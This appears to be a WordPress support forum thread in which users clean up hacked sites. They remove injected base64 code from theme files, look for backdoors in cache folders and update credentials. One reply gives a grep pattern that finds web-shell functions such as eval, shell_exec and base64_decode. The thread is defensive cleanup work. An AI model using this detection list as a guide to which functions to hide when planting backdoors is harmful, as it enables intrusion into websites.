Hi,
I’ve the same problem in my website: http://www.everythingislovely.fr.
The problem occures since yesterday like you.
I don’t know how resolve this. Please, help me too!
Thanks.
First thing you need to do is FTP into your hosting account, check your main index.php, at the top will be a line of code that looks like
<?php base64....
Remove that. Also check the index.php and header.php of each of your theme directories, it’s probably in there as well.
Once you’ve cleaned it out, you need to locate the backdoor that allowed them to inject the code in your site, usually they hide this somewhere in your images, uploads or plugins directory. You also will need to upgrade wordpress to the latest version if you haven’t already and change all your passwords.
cjchamberland,
Thanks for your reply. I have removed the extra code and the website is working fine right now.
The second part that you have asked me to implement – Locating the backdoor to check for how this code came in- can you please tell me how I can go about that.
Sorry for being silly and stupid, but this is just not my forte and the designer who put together my website is showing me the shoulder 🙁
Thanks again!
Nami115, my site was compromised to. I looked through my whole file structure and identified a few files in the cache directory as being suspicious. I’ve changed the names of those files, to see what happens, and while it’s possible that the cache files are not the backdoor, they certainly look like they’re up to no good.
Cache can be found here: /wp-content/themes/yourtheme/cache
You should be able to remove all the cache files without issue, but I renamed them to see if I got it right. There was also a suspicious file in the root that was created today and just had a bunch of IP addresses in it. Not sure what that’s all about… will report back if this fix doesn’t work.
Nami115
In terminal, try running this:
grep -RPn “(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval) *\(” /var/www
Where /var/www is the directory path to your site. So if you download locally modify appropriately. This is not all encompassing but will give you a good idea of what is going on.
Please note, you might get a lot of false positives so you’ll want to go through each finding and verify what it reports. Working with backdoors is a bit of a bear, best of luck.
That last file, peosteve, sounds like conditional malware. Parsing traffic by IPs.
Cheers.
perezbox, thanks for letting me know. I thought it was weird, but figured if there only a bunch of IP addresses in it, it couldn’t do much on its own…
what does that grep… command actually do?
Nami15, still check the cache directory first for suspect entries…and if there’s nothing there, or it’s all normal, follow perezbox.
GREP allows you to parse the content on your server by keying in for key words, phrases, patterns etc.. it’ll actually go through the files looking to see what it can find.
I wrote a post here that better explains what I was saying above: http://blog.sucuri.net/2012/06/understanding-conditional-malware-ip-centric-variation.html
As for not doing anything, sure unless something is referencing it. But then again, it could just be your .htaccess, who knows.. anyway..
And here is an article demonstrating the things you can do with grep: http://www.thegeekstuff.com/2009/03/15-practical-unix-grep-command-examples/
Cheers
It’s a Window server, so there isn’t an htaccess file. 🙂 I’m guessing those files in cache referenced it, but who knows. Looks like the issue is gone, so I’m happy. 🙂
Thanks for all the info about grep and for your suggestions!
Shan
(@shan-last-shreds-of-sanity)
@perezbox where do I find this “terminal” area you posted about? Is it in the MySQL or somewhere else in the CPanel? I actually looked in the MtSQL but see nothing called “terminal”.
I have the following tabs in the MySQL part of the CPanel:
Structure
SQL
Search
Query
Export
Import
Operations
Help?
Hi Shan
What operating system are you running?
Thanks
Shan
(@shan-last-shreds-of-sanity)
WIn7Pro.
So this is on my PC, NOT in the MySQL Database/PHPMyAdmin, correct? I’m not sure my client will know how to do this herself. LOL But I want to check my machine just to be safe.
Hi
Correct, its on your OS. The terminal on Windows is what you get when you run CMD from the start prompt.
But the real question is, are you running WordPress on a Windows box or is that where you spend your time. Most WP instances are on a LAMP stack which means it’s on some kind of NIX distro. What I mention above needs to be executed on the box that the site resides.
Thanks
Shan
(@shan-last-shreds-of-sanity)
Uh…my WP is hosted at Hostgator. How would I find this info out?
Hi Shan
You’re going to want to contact your host and ask that question.
But here is my concern, if you’re stumbling with this I would caution against fiddling on your server. There are a couple of steps you’re going to have to take to connect and make use of the terminal environment, unfortunately each takes time to configure and understand.
Its because of this that I’d recommend you reach out for help if you need, doesn’t sound like you technical background to go at it on your end. I could be wrong though, if I am I apologize.
The last thing I or any one wants is for you to blow up your server.
Thanks
